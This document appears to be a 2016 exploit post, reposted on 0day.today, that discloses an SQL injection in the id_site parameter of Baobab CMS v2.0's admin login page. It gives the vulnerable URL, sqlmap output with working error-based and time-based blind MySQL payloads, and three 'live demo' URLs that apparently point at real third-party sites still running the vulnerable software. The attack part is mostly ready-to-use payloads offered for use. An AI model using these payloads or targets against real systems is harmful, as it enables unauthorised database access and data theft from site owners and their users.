Baobab CMS v2.0 SQL injection Vulnerability

######################
# Exploit Title : Baobab CMS v2.0 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Vendor Homepage : http://www.milkyweb.fr
# Version: 2.0
# Tested on: [ WINDOWS 7]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 02/10/2016
# video Proof : https://youtu.be/XHpDpFfI9dM
######################
# [★] DESCRIPTION :
######################
# [+] Cet outil d’administration vous permet de mettre à jour rapidement
# [+] facilement et sans compétence technique, la quasi-totalité du contenu de votre site internet..
# [+] AND an SQL injection has been Detected in Baobab CMS
######################
# [★] Poc :
######################
# When You want to login You Will Notice id_site Parameter
# [id_site] Get Parameter Vulnerable To SQLi
# http://localhost/admin/accueil/identification.php?id_site=[SQLi]
######################
# [★] SQLmap PoC:
######################
# GET parameter 'id_site' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
#
# ---
#Parameter: id_site (GET)
#    Type: error-based
#    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#    Payload: id_site=3 AND (SELECT 6982 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(6982=6982,1))),
#    0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
#
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind
#    Payload: id_site=3 AND SLEEP(5)
# ---
######################
# [★] Live Demo :
######################
# http://www.generationcampus.com/administration/admin/accueil/identification.php?id_site=3
# http://demontille.milkyweb.fr/admin/accueil/identification.php?id_site=17
# http://baobab.milkyweb.fr/admin/accueil/identification.php?id_site=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2018-04-02]  #